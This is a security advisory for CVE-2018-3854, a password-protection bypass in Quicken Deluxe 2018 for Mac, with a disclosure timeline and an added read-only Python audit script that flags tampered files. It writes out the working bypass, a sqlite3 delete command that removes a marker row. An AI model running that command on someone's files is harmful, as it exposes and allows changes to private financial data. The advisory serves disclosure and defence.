CVE-2018-3854
An exploitable information disclosure vulnerability exists in the password protection functionality of Quicken Deluxe 2018 for Mac version 5.2.2. A specially crafted sqlite3 request can cause the removal of the password protection, allowing an attacker to access and modify the data without knowing the password. An attacker needs to have access to the password-protected files to trigger this vulnerability.
Intuit Quicken Quicken Deluxe 2018 5.2.2
7.1 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CWE-288: Authentication Bypass Using an Alternate Path or Channel
Quicken supports a password protection feature for files. This may be enabled in Quicken from the menu by using “File,” followed by “Set File Password.”
The vulnerability is triggered by removing a row from the SQLite database.
The first of two bypass steps is to change to the directory that houses the database in the Quicken data file:
cd ~/'Library/Application Support/Quicken/Documents/filename.quicken'
The second step is to call a sqlite3 command to remove the table entry:
echo 'delete from ZDOCUMENTPROPERTY where ZNAME is "progressMetadataRefCount";' | sqlite3 data
Use FileVault and encrypt backups.
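Because sqlite3 can open the data file directly, the file password does not encrypt the database, and the row named above is ordinary data that can be inspected. The following read-only audit is an added example, not code from the advisory or from Quicken: it reports whether a file is plain SQLite and whether that row is present, so its absence in a file known to be password-protected can be flagged as tampering. The build_sample helper and its ZVALUE column are constructed for illustration and do not reflect the real schema beyond the table and ZNAME column named above.

```python
import sqlite3
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"  # 16-byte header of an unencrypted SQLite 3 file
MARKER = "progressMetadataRefCount"    # ZNAME value named in the advisory


def audit(db_path):
    """Read-only check of a Quicken 'data' file. Returns a dict of findings."""
    path = Path(db_path).resolve()
    with open(path, "rb") as fh:
        plaintext = fh.read(16) == SQLITE_MAGIC
    findings = {"plaintext_sqlite": plaintext, "marker_present": None}
    if not plaintext:
        return findings  # not openable as plain SQLite, nothing more to inspect
    # mode=ro ensures the audit cannot modify the file it inspects
    conn = sqlite3.connect(path.as_uri() + "?mode=ro", uri=True)
    try:
        count = conn.execute(
            "SELECT COUNT(*) FROM ZDOCUMENTPROPERTY WHERE ZNAME = ?", (MARKER,)
        ).fetchone()[0]
        findings["marker_present"] = count > 0
    except sqlite3.DatabaseError:
        pass  # table missing or file damaged: not the layout described above
    finally:
        conn.close()
    return findings


def build_sample(db_path, with_marker):
    """Constructed stand-in for a data file; the ZVALUE column is hypothetical."""
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE ZDOCUMENTPROPERTY (ZNAME TEXT, ZVALUE TEXT)")
    conn.execute("INSERT INTO ZDOCUMENTPROPERTY VALUES ('sampleProperty', '1')")
    if with_marker:
        conn.execute("INSERT INTO ZDOCUMENTPROPERTY VALUES (?, '1')", (MARKER,))
    conn.commit()
    conn.close()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        for name, flag in (("intact", True), ("stripped", False)):
            build_sample(f"{tmp}/{name}", flag)
            print(name, audit(f"{tmp}/{name}"))
```

A result of plaintext_sqlite set to True on a password-protected file is the underlying exposure, which is why the mitigation relies on FileVault and encrypted backups.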
2018-03-06 - Initial Contact; vendor alerted security team
2018-03-09 - Follow up status on security team response
2018-03-20 - Plain text file sent
2018-04-06 - 30 day follow up
2018-06-06 - 90 day follow up
2018-06-27 - Notice of planned public release due to no response; Vendor responded with security team point of contact
2018-06-28 - Copy of plain text file sent
2018-08-30 - Beta release provided for testing
2018-09-06 - Vendor released to customers
2018-10-09 - Public Release
Discovered by Mark Eklund of Cisco ASIG.